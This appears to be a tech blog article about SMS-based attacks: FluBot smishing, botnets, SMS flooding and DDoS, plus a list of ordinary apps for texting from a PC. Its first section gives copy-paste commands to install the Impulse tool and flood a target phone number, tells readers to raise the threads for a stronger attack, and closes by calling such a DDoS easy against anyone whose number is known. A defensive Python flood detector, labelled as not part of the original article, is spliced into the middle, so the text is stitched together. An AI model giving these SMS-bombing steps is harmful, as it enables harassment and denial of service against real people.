Simple for users, the process of sending SMS texts is simple for hackers too
During 2021, FluBot, a malware that spreads through SMS messages, infected tens of thousands of Android devices. Attackers send texts telling you that you have:
These texts contain a link where you can download what is supposed to be a message for you, but it is actually a malicious app: the FluBot. Once it is installed, it tries to obtain your credit card and banking credentials, and it uses your phone number to send even more SMS texts, creating a botnet.
Records of FluBot date back to April 2021, and CERT New Zealand wrote about it still being infectious in October of the same year, so the virus still exists months after its initial discovery.
Based on recent information that SendPulse, an email and SMS provider, had a data leak of users' credentials, it is very easy to imagine that sending SMS on a mass scale is more than feasible.
After a quick validation by the Cooltechzone team, it was concluded that most of the credentials are no longer valid, and it seems that SendPulse is already aware of this incident.
In this article, I will show you why SMS is so powerful for cyber attackers, how they use tools for sending messages in their criminal activities, and a few tools that you can use to easily send SMS messages from your PC.
Disclaimer: The attack shown in this article was done only for demonstration purposes and no outside targets were involved. Do not perform any malicious actions against others without their consent.
Impulse is a free-to-install app that can be used to perform DoS attacks by flooding the target with SMS messages, a technique called SMS Bombing. It uses Python 3 to run, but it requires no programming knowledge and can be used by typing only a few simple commands.
We performed an attack on ourselves to see if it works. Immediately after launching the attack, we received phone calls and messages on that phone number, which froze the phone for a few minutes.
On Windows, do the following to install and use Impulse:
git clone https://github.com/LimerBoy/Impulse.git
cd Impulse
and then
pip install -r requirements.txt
This command installs some open-source libraries that Impulse requires.
python impulse.py --method SMS --time 20 --threads 15 --target +<phone number>
This command runs a DoS attack with the following parameters:
python impulse.py --help
In the next image, you can see an Impulse attack launched to run 5 seconds on 5 threads. You can increase these numbers to send a powerful attack.
The process is similar on Linux machines. Instead of the first three steps, open Terminal and type the following commands:
sudo apt update
sudo apt install python3 python3-pip git -y
git clone https://github.com/LimerBoy/Impulse.git
So why, in so much time, has no one found a way to eradicate the FluBot?
The answer is that it is very easily transmitted via SMS. Attackers use a technique called SMS Phishing, or Smishing: masquerading as a trusted entity and luring victims into opening a link where they are either asked for private data or prompted to download a malicious app, masked as something benign.
You may have heard about email phishing, but Smishing can be a much more effective way. According to a trusted source, 9 out of 10 text messages are opened within the first three minutes of being received. Also, while emails can be categorized as junk or spam, SMS has no such protective feature. Victims don’t even need an internet connection to receive the messages.
As presented above with FluBot, a good way to send messages to as many people as possible is to create a botnet: a network of infected devices all controlled by an attacker or by a group of attackers. In this case, the infected phones are used to send even more texts, thus spreading the malware.
Of course, a virus whose only ability is to replicate itself is pretty much useless. One of the ways in which these apps can affect you is that they steal your private data stored in the phone, like confidential messages and photos, and can even act as a keylogger, thus obtaining your passwords and sending them to the attacker.
In other cases, attackers want to temporarily block a victim from using their device. This is done through a Denial of Service (DoS) attack, which here consists of (but is generally not limited to) a lot of SMS messages being sent at the same time to a phone user.
For example, a trusted source informs us that, a few years ago, a vulnerability in LG Nexus devices allowed attackers to freeze, crash and even reboot the devices by flooding them with SMS messages, possibly interrupting vital communication.
In the first section of this article, I showed you a free tool that you can install on your PC in order to experiment with how a DoS attack works.
The attacker may want to perform a DoS attack, but not have enough resources to make the attack powerful.
In this case, they can first create a botnet by infecting thousands of phones and then use them to flood a target with messages. This is called a Distributed Denial of Service (DDoS) attack, and it is much more dangerous than a regular DoS attack since it uses all the infected devices to send texts.
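A defensive counterpart to the floods described above, as an added example that is not part of the original article: a sliding-window check that an SMS gateway or monitoring job could run over delivery records, keyed on the recipient so that it flags both a single-source flood and one spread across many senders. The record layout, the thresholds and the phone numbers are constructed assumptions.

```python
from collections import defaultdict, deque

# Assumed thresholds for illustration; tune them to real traffic.
WINDOW_SECONDS = 20
MAX_PER_RECIPIENT = 5


def detect_floods(events, window=WINDOW_SECONDS, limit=MAX_PER_RECIPIENT):
    """Flag recipients that receive more than `limit` SMS within `window` seconds.

    events: iterable of (timestamp_seconds, sender, recipient), sorted by time.
    Returns {recipient: {"peak": n, "senders": k, "kind": "DoS" or "DDoS"}}.
    Counting per recipient (not per sender) is what catches a botnet flood,
    where every individual sender stays under any per-sender limit.
    """
    recent = defaultdict(deque)  # recipient -> (ts, sender) still in the window
    findings = {}
    for ts, sender, recipient in events:
        q = recent[recipient]
        q.append((ts, sender))
        # Drop messages that have fallen out of the sliding window.
        while ts - q[0][0] >= window:
            q.popleft()
        if len(q) > limit:
            prev = findings.get(recipient)
            if prev is None or len(q) > prev["peak"]:
                senders = {s for _, s in q}
                findings[recipient] = {
                    "peak": len(q),
                    "senders": len(senders),
                    "kind": "DoS" if len(senders) == 1 else "DDoS",
                }
    return findings


def sample_events():
    """Constructed delivery records; all numbers and sender IDs are made up."""
    events = [
        (0, "+15550000001", "+15550100001"),    # ordinary traffic
        (300, "+15550000002", "+15550100001"),
    ]
    # Single source: 8 messages in 8 seconds to one number.
    events += [(1000 + i, "SVC-A", "+15550100002") for i in range(8)]
    # Distributed: 10 different senders, one message each, within 10 seconds.
    events += [(2000 + i, f"+1555020{i:04d}", "+15550100003") for i in range(10)]
    return sorted(events)


if __name__ == "__main__":
    for recipient, info in detect_floods(sample_events()).items():
        print(recipient, info)
```

On the distributed sample, each sender delivers only one message, so a per-sender rate limit alone would not trigger; the per-recipient window does.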
In this section, I will first show you a few easy-to-use apps and tools that you can use to send SMS messages from your PC.
Microsoft offers Windows 10 users the Your Phone app, which connects you to your Android phone. The app is simple to use and allows you to manage not only messages but also calls and photos from your phone.
How to use the app:
If you’re an Apple user, a great app that you can use is iMessage. It comes preinstalled on iPhones and you can get it for free on your Mac computer. It can also be used with an iPod Touch or an iPad.
iMessage uses Apple’s own messaging network to send messages over the internet, but otherwise, it works and looks exactly like normal SMS messaging.
To use this feature, first, you will have to set up SMS/MMS forwarding from your iPhone to your other Apple device.
Once you do that, here’s how you send messages using iMessage:
On Google Chrome (or any other Chrome-based web browser), you can install an extension called “Send Your Email to SMS (text)”, offered by cloudhq.net. It will link to your Gmail account and let you send SMS messages very similar to how you would send an email.
Note that this extension supports only US and Canadian phone numbers.
According to a trusted source, it allows you to send up to 10 free messages per month. For $55 per month, you can upgrade the service and send unlimited messages.
To use the extension, do the following:
In this article, I showed you how quick and easy it is to perform a DDoS attack on a target only by knowing their phone number and installing a very simple tool from GitHub. You can do it either on Windows or Linux using this simple guide.
Have you ever used any of the tools shown in this article, or similar? If yes, please leave a comment below sharing your experience!